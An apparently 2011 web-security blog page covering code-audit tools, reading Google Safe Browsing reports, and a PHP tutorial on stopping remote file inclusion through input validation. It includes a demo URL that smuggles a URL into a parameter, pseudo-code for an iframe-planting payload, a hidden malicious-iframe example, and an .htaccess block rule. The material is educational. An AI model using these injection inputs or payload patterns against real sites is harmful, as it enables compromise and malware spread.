
Showing posts with label Web Security.

Tuesday, June 14, 2011

Skavenger – source code auditing tool!

Skavenger? Yes, because scavenger is already used?!?
What is Skavenger? Skavenger is a source code auditing tool, originally thought up for PHP but usable on any kind of source code file, as long as you know what to look for…
I thought of it as a replacement for egrep/sed under Windows, because not everybody installs Cygwin (for example) on their Windows boxes to perform source code auditing. I've seen people who audit source code with Notepad most of the time!
And more…
Skavenger is more than a replacement for egrep/sed because it can run a regular expression, or a series of regular expressions, against more than one file, or even a whole directory, and it prints out line numbers… isn't that sup4 l33t?
Anyway… for downloads and more info check out http://code.google.com/p/skavenger/; you can have a lot of fun with it. Did I mention it is a console application?
P.S. You need PHP in order to use this script. The default values in regex.def check for basic SQL injection and XSS….
P.P.S. For more things to search for under php, check my article at http://insanesecurity.wordpress.com/2007/10/30/source-code-audit-php/
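To make the idea concrete, here is a minimal sketch, in plain PHP, of what such a regex-based audit does. This is not Skavenger's actual code; the patterns and the directory argument are purely illustrative:

<?php
// Hypothetical patterns, roughly the kind of thing a regex.def for PHP might hold.
$patterns = array(
 '/\$_(GET|POST|REQUEST|COOKIE)\s*\[/',  // raw user input being read
 '/\b(include|require)(_once)?\s*\(/',   // possible file inclusion point
 '/\bmysql_query\s*\(/',                 // query possibly built by hand
 '/\b(echo|print)\b.*\$_(GET|POST)/'     // possible reflected XSS
);

// Scan every .php file under the directory given on the command line (default: current directory).
$dir   = isset($argv[1]) ? $argv[1] : '.';
$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($dir));

foreach($files as $file)
{
 if(!$file->isFile() || strtolower(pathinfo($file->getPathname(), PATHINFO_EXTENSION)) !== 'php')
  continue;

 foreach(file($file->getPathname()) as $num => $line)   // file() returns the lines of the file
  foreach($patterns as $p)
   if(preg_match($p, $line))
    printf("%s:%d: %s", $file->getPathname(), $num + 1, $line);  // file:line: matching text
}
?>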

Sunday, June 12, 2011

LAPSE Sourcecode Analysis for JAVA J2EE Web Applications

LAPSE stands for Lightweight Analysis for Program Security in Eclipse. LAPSE is designed to help with the task of auditing Java J2EE applications for common types of security vulnerabilities found in Web applications. LAPSE was developed by Benjamin Livshits as part of the Griffin Software Security Project.
LAPSE targets the following Web application vulnerabilities:
  • Parameter manipulation
  • SQL injections
  • Header manipulation
  • Cross-site scripting
  • Cookie poisoning
  • HTTP splitting
  • Command-line parameters
  • Path traversal
What should you do to avoid these vulnerabilities in your code? How do we protect Web applications from exploits? The proper way to deal with these types of attacks is by sanitizing the tainted input. Please refer to the OWASP guide to find out more about Web application security.
If you are interested in auditing a Java Web application, LAPSE helps you in the following ways:
  • Identify taint sources
  • Identify taint sinks
  • Find paths between sources and sinks
LAPSE is inspired by existing lightweight security auditing tools such as RATS, pscan, and FlawFinder. Unlike those tools, however, LAPSE addresses vulnerabilities in Web applications. LAPSE is not intended as a comprehensive solution for Web application security, but rather as an aid in the code review process. Those looking for more comprehensive tools are encouraged to look at some of the tools produced by Fortify or Secure Software.
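To illustrate what taint "sources" and "sinks" mean in practice, here is a short, hypothetical sketch. LAPSE itself analyzes Java servlet and JSP code, but the idea is language-independent, so the sketch uses PHP to stay consistent with the other examples on this page:

<?php
// Taint SOURCE: data enters the program from the outside world
// (the Java analogue would be something like request.getParameter("name")).
$name = $_GET['name'];

// Taint SINKS: the tainted value reaches sensitive operations unmodified.
mysql_query("SELECT * FROM `users` WHERE `name`='$name'"); // possible SQL injection
echo '<p>Hello, ' . $name . '</p>';                        // possible cross-site scripting

// A taint-analysis tool reports the paths from sources to sinks,
// so a reviewer can decide where validation or escaping is missing.
?>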

Read more about LAPSE HERE.

You can download LAPSE here:
LAPSE: Web Application Security Scanner for Java

Security Compass Web Application Analysis Tool – SWAAT

Announcing a new web application source code analysis tool called the Security Compass Web Application Analysis Tool, or SWAAT.
You may know it as a static analysis tool.

Currently in its beta release, this .Net command-line tool searches through source code for potential vulnerabilities in the following languages:
  • Java and JSP
  • ASP.Net
  • PHP
Using XML-based signature files, it searches for common functions and expressions which may lead to exploits. We believe that this tool will help you in your ongoing source code analysis efforts.

Please visit Security Compass to download SWAAT. Future releases of SWAAT will include plugins for popular IDEs such as Visual Studio .NET and Eclipse.
As the tool is still new, Security Compass appreciates any comments you have on functionality and desired features. Please send any feedback to swaat -at securitycompass.com.

The direct link to download SWAAT is HERE.

The Top 10 PHP Security Vulnerabilities from OWASP

This is a useful article that has basically taken the OWASP Top 10 Vulnerabilities and remapped them to PHP with actual examples.

The Open Web Application Security Project released a helpful document that lists what they think are the top ten security vulnerabilities in web applications.

These vulnerabilities can, of course, exist in PHP applications. Here are some tips on how to avoid them. I’ve included related links and references where relevant.

You can download the detailed OWASP Top 10 Vulnerabilities here.
You can find PHP and the OWASP Top Ten Security Vulnerabilities here.

Sprajax – An Open Source AJAX Security Scanner




Denim Group Ltd. announced today the public release of Sprajax, an open source web application security scanner developed to assess the security of AJAX-enabled web applications.

Sprajax is the first web security scanner developed specifically to scan AJAX web applications for security vulnerabilities. Denim Group, an IT consultancy specializing in web application security, recognized that there were no tools available on the market able to scan AJAX. AJAX gives web-based applications a higher degree of user interactivity, a feature of growing popularity among developers.

You can download Sprajax here.

"As AJAX becomes more popular with developers, the security of AJAX-enabled web applications will be a growing concern," says Dan Cornell, Principal at Denim Group. "Sprajax is a great tool for application security maintenance, and its availability as an open source application places it within reach for organizations of all sizes."


While expert security scans are more thorough and usually recommended, internal developers and security auditors can use this software to produce an initial vulnerability assessment. This can be invaluable, especially in the wake of government regulations regarding web application security. Organizations must take steps to protect sensitive data in public-facing applications, and an assessment using a tool like Sprajax could be the first step.

Is Open Source Really More Secure?



Is Open Source more secure? That's a question that can be answered with both yes and no, and the reasons for the "yes" and the "no" are pretty much the same. Because you can see the source, the task of hacking or exploiting it is made easier; but at the same time, because it's open and more easily exploited, the problems are more likely to be found.

When it comes to open source, the hackers and crackers are doing us a favour: they find the problems and bring them to the attention of the world, where some bright spark will write a fix and let us all have that too. All well and good.

However, I think this could also be a problem, because let's face it: any monkey can download "free" software to use for this or that, with little or no idea how it actually works. They don't check for fixes and updates, often believing "it will never happen to me". In part this is because they just don't see any reason for someone to hack them. But in the modern world, where any script kiddie can download a virus construction kit or a bot to run exploits against lists of servers, it's no longer a case of being targeted. They don't care who you are; it's the box they are after.

Recently a friend of mine suffered from this very problem; he didn't believe he was worth the effort to hack. But simply by using an open source web app he unwittingly made himself a target. Though a fix was available, he wasn't aware of it. It was only when his host contacted him about problems that he even realised he'd been exploited.

With the growing popularity of the internet and open source solutions, more and more unskilled users are installing software they don't even understand. Even worse, as any one application grows in popularity, it becomes a more worthwhile target for the lowlife script kiddies out there.

The problem has been exacerbated by the simple truth that, with modern scripting languages such as PHP, it is getting easier and easier to make something. Being able to hack code together until it works might be fun, and you might make something that does the job, but it's not a way to make safe, secure software.

Most often exploits are based on stupid mistakes, errors that should have been found early on but weren’t because the code evolved, expanded and changed. No design, no planning, just code it until it works. This is the original meaning of “hacking”.

Now, without mentioning names, I have pulled apart the code used in the CMS my friend mentioned earlier was using, and without doubt I can say it's poorly written. But it was free, so no one can complain.

I am sure there are some very good open source applications, Linux and Apache to name a few, but there is even more "open source" that's just garbage. Just because it's free doesn't mean it's good. Just because it's popular doesn't make it better. In fact, as far as I can tell, if you want to use open source applications you're probably better off choosing one nobody else has really bothered with; that way you're less likely to become a victim.

Closed source always has the advantage that the problems are a little harder to find; however, and this is important, that doesn't mean it's any better. As a friend of mine pointed out, open source might be easier to hack in some ways, but because of that the problems come to light and are generally fixed quickly. Whereas with a closed source application it's actually in the interests of the authors to keep any problems hidden; if it's not a common problem it may even go unfixed, because the author sees it as unlikely that anyone else will ever find it. Or a fix will be bundled up with a later version, and thus many people will never even know they could be at risk.

In the end I do believe open source is good for us all, but it's important to check regularly for updates, patches and fixes. If you don't, on your own head be it.

Saturday, June 11, 2011

How to understand the Google Safe Browsing Diagnostic report for malicious or hacked websites



When the Google web crawler visits a site and gets attacked by malware, Google flags the site as suspicious with a "This site may harm your computer" warning in search results. The search result links no longer go to the site, but go instead to an explanatory page about the warning. The Firefox browser, which looks up sites in the Google Safe Browsing database, displays a "Reported Attack Site!" warning, with a link to the explanation. By either of these routes, you can end up at a Google Safe Browsing Diagnostic report.  
Another way to view the Safe Browsing Diagnostic, for any site, is to enter this URL in your browser address bar. Replace EXAMPLE.COM with the name of the site:
http://www.google.com/safebrowsing/diagnostic?site=EXAMPLE.COM
The report is short and lacks explanation, but it contains useful information for webmasters who are trying to clean up their legitimate sites that have been turned dangerous by hackers. 
Below are explanations of the sections of the Safe Browsing Diagnostic report, directed toward webmasters who are trying to clean up their websites. This page was previously part of a long article about how to diagnose the reason a site is flagged and how to get the Google warning removed.

What is the current listing status for _____?

Site is listed as suspicious - visiting this web site may harm your computer.

This tells you whether your site is listed right now as suspicious. If it is, it means that Google has determined that at least one of your pages, by one method or another, under at least some circumstances, is causing visitors to get attacked by malware. There will be warnings (as described above) in Google search results and in the Firefox and Chrome browsers. Internet Explorer does not use the Google Safe Browsing database (it uses a Microsoft database), so IE might not give any warning message. That does not mean the site is clean. If the Google Safe Browsing diagnostic says that visiting a site can cause malicious content to be downloaded to your computer without your permission, you can be almost 100% sure that their assessment is correct. 
If this report disagrees with what you see in search results (for example, you know that your site currently is flagged in search results, but the diagnostic says it is not listed as suspicious), it's possible your site has more than one diagnostic report and you need to find the other(s). There are at least two situations where you can have more than one diagnostic report: 
  1. Only part of your site, not the whole site, is flagged. In the search results, click the link to one of the pages that is flagged, to get the diagnostic report for that part of the site, such as example.com, example.com/forum, or blog.example.com.
     
  2. In the past, it was possible to have separate diagnostic reports (which sometimes did not agree with each other) for example.com and www.example.com. Google seems to have resolved that problem in most cases, but check out this possibility anyway if the diagnostic does not seem to be accurate for your situation.
If the diagnostic report says your site is not listed as suspicious, but you still get warnings in Firefox, it is due to a delay in Firefox updating from the Google database, and is normally resolved within a day or so. 

Part of this site was listed for suspicious activity 9 time(s) over the past 90 days.

This tells you the recent history. In the example above, the site has been flagged and unflagged 9 separate times, which is a lot. Its webmaster has probably been removing malicious code over and over again but not fixing the site's security vulnerabilities, so the site keeps getting hacked repeatedly.

What happened when Google visited this site?

Of the 110 pages we tested on the site over the past 90 days, 11 page(s) resulted in malicious software being downloaded and installed without user consent.

This is mostly self-explanatory. It gives you an indication how widespread the infection is in the pages of your site. You can get a partial listing of the pages Google considers suspicious at Webmaster Tools at Google Webmaster Central.

The last time Google visited this site was on 2009-11-20, and the last time suspicious content was found on this site was on 2009-11-20.

When the first and second dates are the same, it means that the most recent review found malware. The site is still infected.

The last time Google visited this site was on 2009-11-20, and the last time suspicious content was found on this site was on 2009-11-18.

This means that the most recent review did not find malware. If your site is still shown as "suspicious" even though the last scan did not find malware, the status should change to "not suspicious" within approximately 1 day, unless the site has been flagged many times recently. In that case, there might be a several-day delay while Google waits to see if the site stays clean. Another reason for a delay is if you deleted the infected pages instead of cleaning them. Google wants to see cleaned pages. They do not want you to delete pages, get the flag removed, and then put infected pages back online.

Malicious software includes 1 scripting exploit(s), 1 trojan(s). Successful infection resulted in an average of 1 new process(es) on the target machine.

This itemizes the kinds of malware that attacked the Google crawler when it visited your pages.

Malicious software is hosted on 2 domain(s), including gumblar.cn/, beladen.net/.

When your pages cause malware to be loaded into a visitor's browser, it means just that: they cause it to happen. It does not necessarily mean the actual virus code is in your page. It probably isn't, and it probably is not even in some other file on your website. Usually, the virus code is stored at some other site. But if your page contains an iframe that fetches its content from that other site, it will cause the malicious code to be loaded into the visitor's browser.
This line in the diagnostic is the list of sites where the malware is actually hosted (stored). The visitor's browser is fetching the virus code from there. If you are hunting for malicious iframes in your website files, these domain names are ones you should be hunting for. Unfortunately, they might be encoded in a way that makes them hard to find with a text search, and it is also possible that other domains, rather than these, are referenced in your iframes. The reason is that sometimes there is a chain or sequence of events, involving other intermediary websites, that eventually, but not immediately, causes malware from the above sites to be loaded. I will discuss intermediaries in the next section.
This list of hosting domains can be very helpful. In the first of the examples above, the reference to gumblar.cn means that it is certain your site was hacked as the result of a virus infection on the PC of one of your website administrators, which stole the FTP password. In the second example, the reference to beladen.net means that it is not just your website that is compromised; the entire server is infected, and so are all the websites on it. A web search on the domain names you find in this list can help discover what type of infection your website has and also can indicate what type of security vulnerability it has that allowed it to be infected. Unfortunately, it doesn't often lead to such definitive conclusions as it does for gumblar or beladen.   
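If you are hunting for injected iframes in your files, they typically look something like the hypothetical snippet below, although in real infections the markup is usually obfuscated with JavaScript or packed onto one long line, and the domain will be one of those named in the report:

<!-- hypothetical example of an injected, invisible iframe -->
<iframe src="http://malicious-domain-from-report.example/in.php" width="1" height="1" style="visibility:hidden;"></iframe>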

3 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including...  

As mentioned above, when your site is loaded in a browser, elements in your page such as iframes can trigger a chain of events that bring malicious content to the visitor's browser. That chain could involve several hops, through several different websites, before the malicious code gets delivered.
For example, let's say your page contains an iframe that loads a page from site A, but that page consists of JavaScript code that fetches and executes a VBScript from site B, which fetches a Trojan downloader (the payload, the first part of the actual malicious software, which might consist of several parts carrying different types of attacks) from site C.
In this scenario, your site will certainly be flagged for causing the malicious content to get loaded into the visitor's browser (initiating the sequence). Sites A and B are intermediaries in the chain, and site C is the host of the code that carries out the attack.
When you are searching your code for hidden iframes, search for domains listed in this section of the report as intermediaries, in addition to the ones listed in the previous section as hosts.  

This site was hosted on 1 network(s) including...

This tells you the internet network where your site is hosted.  You might recognize the name of your webhost here, or the name of a larger network that your host is part of. This does not seem to be particularly useful information. Any large network will have many compromised websites in it, and no large network will consist 100% of compromised websites.  

Has this site acted as an intermediary resulting in further distribution of malware?

Over the past 90 days, _____ appeared to function as an intermediary for the infection of __ site(s) including _____, _____, ...

Is your site one of the intermediaries as described in the previous section? In addition to the general scenario presented above, here are two more specific ones:
  • Let's say you host a PHP script that other sites call to get dynamically generated content from you. Your site gets hacked, and someone injects your PHP code with iframes that point to a third site that hosts malicious code. As long as your own site's pages don't call your own PHP script, you're not causing malware to be loaded into a visitor's browser, and you're not the host of the malware, either, but your PHP script is facilitating the distribution of malware by acting as a middle link. You're an intermediary.
     
  • Let's say you are an advertising distributor. You accept ads submitted to you by companies who want to advertise, and you place those ads on the sites in your publisher network. One of your advertisers submits a malicious ad. When the ad appears on your publisher websites, you're an intermediary. This Safe Browsing report is an example of an advertiser listed as an intermediary at the time of this writing. Note that although they are not flagged as suspicious, and their own pages are not flagged in search results with "This site may harm your computer", they can be causing their publisher network sites to get flagged. 

Has this site hosted malware?

This part of the report usually says No. As mentioned earlier, most sites, even compromised ones, do not actually host (contain) the virus code. The hackers store the virus code at a central location. Then they hack many sites, injecting iframe code that points to the central location. With this arrangement, they can change the virus code quickly and easily. The changes get propagated throughout the internet without their having to re-hack thousands of sites to update the code to the new and improved version.
If your report says Yes, your site is hosting malware, then you are one of the chosen few where they actually are storing the virus code. When web surfers load pages from other sites, those pages contain iframes that point to your site and fetch the virus code from your site. Obviously, you need to find where the virus code is being stored in your website files.
If your report says No, this site has not hosted malware, that does not mean your site is clean. It only means your site is not a central location where the virus code is being stored.

Notes

  • In the scenario described earlier where your site is flagged because its pages initiate the sequence of malware delivery and "sites A and B are intermediaries, and C is the host", the intermediaries and hosts will not necessarily be flagged as suspicious. This is counterintuitive, because the intermediaries and hosts are a danger to the internet: they are either conduits for the flow of malware, or they store it so it can be used in attacks against web surfers or against other websites.

    The internet danger level would be reduced if these sites were flagged as suspicious. It would alert the webmasters (at least the ones who are innocent victims) that their sites need to be cleaned and better secured. Without such warning, many webmasters of sites that are intermediaries or hosts have no idea that they have a problem.

    The best sense I can make of this situation is that the Google search result warning is intended to help protect web surfers by giving them information they can do something about: they can avoid going to a flagged site.

    Intermediary and host sites usually play their part through "orphan" files hidden inside their sites. These are files that have no ordinary hyperlinks pointing to them from anywhere on the internet. Because they are not pages that web surfers can get to by following links, and because Google's intent is to protect web surfers using their search results (not necessarily to "make the internet safer"), they do not bother to flag intermediaries and hosts. Once a web surfer visits a site that initiates the delivery of malware, the chain through the intermediaries and hosts is automatic. There is nothing a web surfer could do about it even if they had advance warning, so there is no point in creating such a warning. 

    There is something a web surfer can do for protection, however: turn JavaScript Off. In many cases, that will prevent you from being redirected into the chain of intermediaries and hosts, and prevent the malware from being delivered to your browser.

Unusual situations observed

1) Firefox blocked access to a "Reported Attack Site", but the site was not flagged in Google search results. The Safe Browsing Diagnostic report said suspicious content was "never found", yet it also said that the suspicious software was hosted on 3 domains, and gave their names. The reason: the website was hacked and did redirect visitors to the sites that Google knew were malicious. However, the malicious sites had already been shut down, so they weren't serving any actual malware.

How to use data validation to avoid Remote File Inclusion (RFI) vulnerabilities in your code, with examples


A remote file inclusion (RFI) vulnerability is a security flaw in programming code. Whenever a script receives data from outside itself, there is a danger that the data was sent by a malicious attacker, a hacker, who designed it so that it would corrupt the execution of the script and trick it into doing something it wasn't supposed to do.
One of the actions that a corrupted script can be tricked into doing is to fetch a file from a distant website (that is the "remote file") and include() it into the body of the corrupted script (that is the "inclusion"). Whatever program code is in the remote (but now local!) file becomes part of the corrupted script, and it executes right along with all the other code.
RFI therefore allows hackers to run their code on your server, with the same access permissions (to folders and files) that your own code has. 
The key to success of an RFI attack is that the hacker must be able to send the URL of the remote file into your script, disguised as innocent data.
That's easy. All they have to do is find (or guess) the avenues by which your script accepts incoming data, make note of the variable names you use (or guess them, using common names), and then start sending your script ordinary requests of the type it normally expects, but with one difference: the value of every variable they send is the URL of the remote script they want your script to execute. 
They have no control over whether your script actually uses the incoming data in PHP include(), include_once(), require(), or require_once() statements (or their equivalents in other languages), but it is so common for that to be the case that this is a high percentage play for them. 
An important defense against RFI attack is to write your scripts to examine every incoming variable to ensure that its data type, character composition, format, and value are "legal" according to the characteristics your script expects that variable to have. If an incoming variable is not what you expect, your script must not use it. 
This is called data validation or "sanitizing" or "scrubbing". It is the topic of this article.

Untrusted data (from outside the script) requires validation

When you set a variable explicitly in a script with:
$a = 4;
that data is considered trusted. You are in control of it. You set it yourself, and presumably not maliciously. Likewise, if you read data from a file or other source that you completely control, that data is trusted.
Data is "untrusted" when it comes from a source you don't control completely.
Common ways PHP scripts receive untrusted data from the outside world:
  • $_GET[''] data, received from the user in the URL query string.
  • $_POST[''] data, usually received from the user through HTML form submissions.
  • $_COOKIE[''] data, received from the user in the cookie sent by their browser.
    You initially control the cookie when you create it, but the user can edit and modify it before their browser sends it back.
  • $_REQUEST[''] data: all the $_GET[''], $_POST[''], and $_COOKIE[''] variables, combined into one array.
  • Any of the other variables listed here (and on the linked pages) that came from the user or their browser, or that are based on information that came from them. 
Before each of these incoming variables is used in a script, it is necessary to ensure that it has a value in the set of, or within the range of, the legitimate values your script is designed to handle for that variable. If it is not, you should instead give it a safe default value, or not use it at all, or reject the submission and inform the user that the input was invalid, whichever option is appropriate to your application.
Some of the ways you can test variables include:
  1. Ensure length is within the expected range, or cut it to the maximum acceptable length.
  2. Test it against a regular expression (regex) to ensure it doesn't contain unacceptable characters.
  3. Ensure numeric input has only digits and other number-related characters. Examples: +-0123456789.e
  4. Ensure numeric input is within the expected numeric range.
  5. Compare the value (string or numeric) against a list of all possible acceptable values. Ensure that it matches one of them.
  6. Test the input with a PHP Validating Filter.
The example code will show methods of doing all these tests, but first let's do some experimenting to see what RFI is all about.

Valid and invalid data in form submissions, and an RFI demonstration

Although this page doesn't have a form on it, it is designed to handle form submissions using HTTP GET requests.
You submit the data manually by copying and pasting URLs for this page into your browser's address bar. The URLs have the same format as ones generated by a browser when you submit a form. Doing it manually will help understand what an RFI attack is and how it works.
The hypothetical form has two fields:
  • Age: input is numeric only, and only values from 0 to 114 are allowed.
  • Favorite Color: input can be text (red, blue, green) or numeric (1=red, 2=blue, 3=green).
    If the script receives a number, it is translated within the script to the corresponding color. 
Here are some example URLs to paste into your browser address bar. You'll see the result of your "form submissions" at the top of the resulting page.
  • This is a legitimate request with legal values. Your age is 25, and your favorite color is blue. If you wish, you can manually edit the URL to experiment with other combinations:
http://25yearsofprogramming.com/blog/2011/20110124.htm?age=25&color=blue
  • This is a legitimate request with age=50 and a numerically encoded color (3=green):
http://25yearsofprogramming.com/blog/2011/20110124.htm?age=50&color=3
  • This is an invalid request with a non-numeric age and a color that the script is not designed to handle. The resulting output color is not violet but red because the script sets red as the default color. When the user submits an illegal color, their input is ignored. Age is handled the same way. The default age is 0:
http://25yearsofprogramming.com/blog/2011/20110124.htm?age=noyb&color=violet
So far, all seems quiet. Whatever you enter, the output you get is an age and a color. If you try to do something invalid, you get a default age and a default color. Big deal.
  • The next experiment is an RFI attack. Copy and paste the URL into your address bar. If your browser displays the text below as 2 lines, copy them both. It's a one-line URL. If your sharp eyes spot a typographical error in the URL query string, don't correct it. It's intentional (see Note 5):
http://25yearsofprogramming.com/blog/2011/20110124.htm?age=75&color=htpp://25yearsofprogramming.com/robots.txt
What happened??! You've got a lot of nerve! You hacked my website!! OK, not really. We're pretending. What happened was this:
  1. My script was expecting you to supply a color, as before. It uses a PHP include() command to include one of my website files into the page text, based on which color you submitted.
     
  2. I FAILED to use the methods described later in this article to test whether what you supplied really was a legitimate color, or any color at all.

    So my script made the mistake of including the value that you DID supply, which was the URL of my robots.txt file, and that's what you see on the result page.

    You completely hijacked the color processing that was supposed to occur, and tricked my script into doing something different, not what I, the programmer, wanted to happen, but what YOU, the hacker, wanted to happen.

    The simple printout of my robots.txt looks harmless enough, but do you appreciate what a horrible thing has just happened?
     
  3. What if you had given it the URL of a PHP script located on (for our example) YOUR website? My script would just as happily have fetched that file from your website, and included that into the page. But this time it's not a harmless robots.txt. It contains PHP code. That code would have become part of MY script, and it would have executed.
If my original code (in pseudo-code form) were:
fetch_the_color_file();
place_its_text_on_the_page();
do_more_stuff();
it could then become:
fetch_the_color_file();
place_its_text_on_the_page(); // but it's PHP code!, so it runs and does this:
make_a_list_of_all_files_in_my_site();
for(every_file)
{
 open_the_file_in_append_mode();
 add_a_virus_infected_iframe_to_the_bottom();
 save_the_file();
}
do_more_stuff();
All that extra code came from the file on your website. It got inserted right into the middle of my own code, and it ran. Now every single page of my site has a virus-infected iframe in it. That's what I get for failing to make sure that what you sent me was a legitimate color! 
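As a concrete, hypothetical sketch of the mistake being described, the vulnerable color handling and a whitelisted version might look like this (the file names are illustrative only; the next section shows several more ways to do the validation step):

<?php
// VULNERABLE (hypothetical): whatever arrives in ?color=... goes straight
// into include(). A URL supplied by an attacker becomes a remote file inclusion.
include($_GET['color'] . '.php');

// SAFER: only values from a fixed whitelist ever reach include().
$Color = 'red';                                   // safe default
$LegalColors = array('red', 'blue', 'green');
if(isset($_GET['color']) && in_array(trim($_GET['color']), $LegalColors, TRUE))
 $Color = trim($_GET['color']);
include(__DIR__ . '/colors/' . $Color . '.php');  // always a known local file
?>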

PHP $_GET[''] Data Validation Example Code

The examples show several methods of validating $_GET[''] variables. The same methods apply to $_POST[''] or the others. Links go to documentation pages at php.net.
The basic strategy is the same for all methods:
  1. It's easier if you don't use the incoming $_GET[''] variables directly throughout your script.
    Instead, create an ordinary local variable to hold each incoming value.
  2. Initialize each variable with a legitimate starting value.
    That will be its default if the incoming replacement value is missing or invalid.
  3. Test each incoming $_GET[''] to make sure it is completely legitimate for what it is supposed to be.
    If it is supposed to be an integer, it must contain only digits.
    If it is supposed to be one of 5 possible values, make sure it exactly matches one of the 5.
  4. Transfer the $_GET[''] value to the local variable only if it survived the tests.
    Otherwise, use the default values or abort the script, whichever is appropriate to the application.
After you remove the comments, you'll see that none of the examples have much code.
Validation can be easy.

1) Compare incoming value against an array of all possible legal values

If there are many legal values, you could keep the list in a file and use the file() function to read it into the array when you need it.
<?php
// LOCAL VARIABLE WITH ITS LEGITIMATE DEFAULT VALUE
$Color = 'red';

// ARRAY OF ALL POSSIBLE LEGAL VALUES FOR THE VARIABLE
$LegalColors = array
(
 'red',
 'blue',
 'green'
);

if(isset($_GET['color'])) // IF USER SUBMITTED A COLOR VALUE
{
 // REMOVE IRRELEVANT LEADING/TRAILING WHITESPACE FROM THE INCOMING TEXT
 $_GET['color'] = trim($_GET['color']);

 // CHECK AGAINST THE LEGAL-VALUES ARRAY, WITH STRICT TYPE CHECKING
 if(in_array($_GET['color'], $LegalColors, TRUE))
 {
  // TRANSFER THE INCOMING VALUE TO THE LOCAL VARIABLE
  $Color = $_GET['color'];
 }
 // AN else {} HERE COULD ABORT THE SCRIPT IF THE VALUE WAS ILLEGAL
}
?>

2) Test incoming value against a regular expression

This example uses a regular expression to test against all possible legal values. That is an exact duplication of the array validation method above, but regex testing can be used more flexibly than that: you can test for variations and patterns rather than against specific entire strings. Be sure that your regular expression matches all the possible legal values, but nothing else.
<?php
$Color = 'red';

if(isset($_GET['color']))
{
 $_GET['color'] = trim($_GET['color']);
 if(preg_match('/^(red|blue|green)$/u', $_GET['color']))
  $Color = $_GET['color'];
}
?>

// OTHER USEFUL REGULAR EXPRESSIONS. A WEB SEARCH WILL FIND MANY COMMON ONES.

if(preg_match('/^[A-Z]{1,8}$/', $_GET['var']))  // 1-8 UPPERCASE ALPHABETIC
if(preg_match('/^[A-Z0-9]{1,8}$/i', $_GET['var'])) // 1-8 UPPER/lower ALPHANUMERIC

3) Test incoming value with switch cases

The switch method allows some additional flexibility: you can translate incoming values to different values for internal use. This example, in addition to allowing the color names, allows numeric color values of 1,2,3 and uses the cases to translate them to red,blue,green for internal use. If I only used the numbers in publicly visible URLs, I could prevent anyone knowing what values they are translated to internally.
<?php
$Color = 'red';

if(isset($_GET['color']))
{
 $_GET['color'] = trim($_GET['color']);

 switch($_GET['color'])   
 {
  case 'red': 
  case '1': 
   $Color = 'red';  
   break;
  case 'blue': 
  case '2':
   $Color = 'blue';
   break;
  case 'green': 
  case '3':
   $Color = 'green';
   break;
  default:
   // YOU COULD ABORT SCRIPT HERE
   break;
 }
}
?>

4) Validating numeric values

<?php
$Age = 0;

if(isset($_GET['age']))  // IF USER SUBMITTED AN AGE VALUE
{
 $_GET['age'] = trim($_GET['age']);

 // "IF THE INPUT CONSISTS OF 1 TO 3 DIGITS"
 if(preg_match('/^[0-9]{1,3}$/', $_GET['age']))
 {
  // FORCE THE VARIABLE TO THE REQUIRED TYPE
  settype($_GET['age'], 'integer');

  // TEST FOR ACCEPTABLE MINIMUM, MAXIMUM VALUES
  if(($_GET['age'] >= 0) && ($_GET['age'] <= 114))
  {
   // ACCEPT THE VALUE TO OUR LOCAL VARIABLE
   $Age = (int)$_GET['age']; 
  }
 }
 // AGAIN, IF INCOMING VALUE WASN'T VALID, LOCAL $Age WASN'T CHANGED.
}
?>

5) Validating numeric values with a PHP Filter

This alternative uses a PHP 5.2+ validating "filter function" to validate an integer with less code:
<?php

$Age = 0;

// RETURN VALUE IS THE VALIDATED INTEGER (ON SUCCESS), OR FALSE, OR NULL
$i = filter_input(INPUT_GET, 'age', 
 FILTER_VALIDATE_INT, 
 array('options'=>array('min_range'=>0, 'max_range'=>114)));

if(($i !== FALSE) && ($i !== NULL))
 $Age = $i;

?>
The following code is equivalent. I currently recommend using it instead because it appears to me that filter_var is more reliable, predictable, and portable than filter_input. The user comments at php.net about filter_input (see the link) mention odd behavior that I've also experienced.
We must use isset() because filter_var throws an error if the tested variable isn't set. In the example, the default $Age of 0 is used if $_GET['age'] is not set, and is also specified as the default value if it is set but invalid.
<?php

$Age = 0;
if(isset($_GET['age'])) 
 $Age = filter_var($_GET['age'],
  FILTER_VALIDATE_INT, 
  array('options'=>array('default'=>$Age, 'min_range'=>0, 'max_range'=>114)));

?>

More defenses against RFI

Two other methods of RFI defense can serve as backup, in case you make a mistake in your script and allow some variables to go unvalidated, or in case an application you use contains not-yet-discovered RFI vulnerabilities:
  • Configure PHP so that it will not fetch files from remote websites, even if a program tells it to.
    See the settings allow_url_fopen and allow_url_include.
  • Use Apache .htaccess to ban (reject, without processing) requests where the HTTP query string contains a URL disguised as innocent data.
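Here is a minimal sketch of both backstops, assuming Apache with mod_rewrite and access to php.ini; the directive names are real, but the exact rule and file locations vary by host:

; php.ini (or a per-site override): refuse to open or include remote URLs,
; even when a script asks for it.
allow_url_fopen = Off
allow_url_include = Off

# .htaccess: reject, with a 403, any request whose query string smuggles in a URL.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{QUERY_STRING} (^|&)[^=]*=https?:// [NC]
RewriteRule .* - [F]
</IfModule>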

Notes

  1. All security-related validation must be done in your server-side PHP code. If you want, you can do preliminary validation on the client side with JavaScript in the user's browser, but they can easily avoid that validation by turning JavaScript off. Besides, malicious robots (which are the real threat) don't run your JavaScript. They don't even load your web page. They send their malicious data directly to your PHP script. It's similar to how, in the earlier RFI experiment, you entered your "malicious" requests directly into your address bar.
     
  2. There is another type of attack called Local File Inclusion (LFI). It attempts to trick your script into including a sensitive file (such as a password file) from your server. The method of attack is the same: it sends the path and name of the file it wants to see, hoping your script will include() it. The defense is also the same: if you receive a variable value that is not one of the legal ones you were expecting, don't use it.
     
  3. You can discover whether your website is receiving RFI or LFI attacks at my hack attempt identifier.
     
  4. Whenever a security vulnerability report, such as at Secunia.com, says that an application uses "unsanitized input", it means that the application fails to use the methods described above to validate input. It is therefore vulnerable to attack.  
     
  5. Because of the protections I use against real RFI attacks, this example works only because it is a simulation (note the intentional typo in the URL). If you correct the typo and paste the properly formatted URL into your address bar, it becomes a real RFI attempt, and you'll just get a blank page. Use your browser's Back button to return to the page you're reading now.  
     
  6. Although this article and its examples are about PHP, the same principles apply to all languages. It's not the 1980's anymore. Any program that will be used by someone other than you needs to protect itself against the possibility that incoming data is malicious. Data validation is tedious for the programmer and causes code bloat, but it's necessary.

How to avoid SQL Injection vulnerabilities in your MySQL database query code, with examples



